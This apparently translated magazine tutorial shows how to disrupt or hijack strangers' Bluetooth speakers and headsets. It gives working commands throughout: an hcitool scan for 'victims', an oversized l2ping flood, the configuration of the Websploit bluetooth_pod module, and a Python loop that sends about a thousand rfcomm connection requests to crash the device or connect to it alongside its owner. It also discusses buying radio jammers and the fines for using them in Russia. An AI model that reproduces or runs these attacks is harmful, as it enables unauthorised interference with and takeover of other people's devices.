DoS on Bluetooth. We analyze a trick that will help turn off someone else's column.

[Brother]

There are not many things in the world that infuriate almost everyone, without exception. These are spring-autumn slush, summer hot water cut-off and schoolchildren with portable Bluetooth speakers. And if practically nothing can be done with the first two natural disasters, then with the third it is quite possible to fight, and almost without crime. How? Let's talk about this.
While modern Wi-Fi routers are capable of filtering unwanted packets, most Bluetooth adapters are, to put it mildly, dumb. By and large, they do not care what package and how much, and even more so how many of these packages you send. Therefore, it is absolutely not difficult for us to increase the information volume of the ping packet in Linux to a huge value, and then send these packets to a device with Bluetooth, say, 1000 pieces.

Now in order. First, we need to find suitable devices within reach. To do this, use the command

$ hcitool scan

As a result of this simple manipulation, you will receive a list of available Bluetooth devices with their MAC addresses. If your system does not see the Bluetooth adapter, then I recommend installing one of the Bluetooth managers for Linux. In Kali, I was personally approached by gnome-bluetooth, which can be installed with the following command:

$ apt-get install gnome-bluetooth

You can also use the blueman utility:

$ apt-get install blueman

Having received a list of potential victims, you can deal with their blue-toothed devices in several ways. Let's consider each one separately.

Method one: l2ping​

Let's use the following command:

$ l2ping -i hci0 -s <packet value> -f <MAC_address>

It will generate packets of the <packet value> size you specified in the parameter and will send these packets to the MAC address recorded as a parameter <MAC_address>. In the end, you will see the following picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After a while, it will still turn on, but the music will be interrupted and some satisfaction will be obtained.

INFO
This scheme works very well when the attacked device (for example, a phone) is connected to a headset or speaker via Bluetooth. After the attack, these two devices will not be able to connect with each other.

Method two: Websploit​

There is a more elegant and convenient way to drown out the loudspeaker from which the cheerful rap sounds come out. We launch the Websploit utility:

$ websploit

We type the command in the console

$ show modules

She will show us all the modules that work with this utility. There are many components that work with Wi-Fi, but we are specifically interested in the bluetooth / bluetooth_pod module:

$ use bluetooth / bluetooth_pod

Now you need to configure all the parameters and specify information about the attacked device:

$ show options
$ set bdaddr <MAC_address>

To accurately and surely ditch Bluetooth, we will change the size of the sent packet:

$ set size 999

All preparatory steps are completed, we can start our "killing machine":

$ run

At the exit, we will see an absolutely similar picture: pings become longer, and the music is interrupted. The beauty!
These two methods will work with almost any bluetooth speaker, headset and other similar devices. Simply because manufacturers do not release new firmware for them that can filter incoming packets. So, if you have a laptop with Linux on board, you can definitely call yourself a thunderbolt of portable speakers.
If the column copes with the attack, you can try to send packets to the phone itself to which it is connected. Personally, I tested this method on a fairly powerful portable speaker (JBL Xtreme), and it handled the load more or less. But such an attack knocks out cheap Chinese crafts at once.

About ready-made jammers​

Curious products are sold on the Internet, among which you can find frequency jammers. They usually cost decent money and provide different options. Some can knock down almost all signals of the mobile network, Wi-Fi and Bluetooth at once, while others will not cope with H +.
If you think that you really need a similar product, then before purchasing it, I strongly recommend that you familiarize yourself with the current legislation. In Russia, it is not forbidden to buy and sell jammers, but if you decide to use it, you must register the device with the State Committee for Radio Frequencies. If you are caught using an unregistered device, then most likely you will be fined under article 13.4 of the Administrative Code of the Russian Federation. The fine for individuals today is 500 rubles, for legal entities - up to 10 thousand.

We connect to someone else's device​

As we already know, primitive speakers and headsets almost never filter the packets we send them. But what happens if you send to such a device not just a packet with data for ping, but a packet with a request to connect to the device? And not alone.
Not all manufacturers of such headsets have taken care of buffer overflow protection. If all packages are queued, what happens when there is nowhere to store requests? The column will try to execute the command and flush the buffer.
Therefore, we use the standard Bluetooth communication protocol - rfcomm. But since the utility that controls the protocol itself will not allow us to send a thousand such requests, we will write a small Python script that automates the process.

#!/usr/bin/env python
import subprocess

cmd=['rfcomm', 'connect', '<MAC_address>', '1']

for i in range(0, 1001):
    subprocess.call(cmd)
print('Connecting...')

Before running the script, we need to find out the MAC address of the device. To do this, we use the already familiar command hcitool scan, and insert the resulting address into the script instead of <MAC_address>. Now we save the script and run it:

$ python <FileName>

Whether the script works or not depends on the model of the attacked device, or rather, on the speed at which the buffer is filled. If the buffer has time to fill up before it is cleared, then the command will be executed, and then we will connect to the column at the same time as the main user. If the buffer is cleared, then nothing will work and you will have to restart the script.
If our script is successfully completed, we can have our own disco or shut down the device. My personal experiments with the JBL Xtreme speaker led to its shutdown, but the JBL Flip 2 was once able to intercept (now it is not at hand).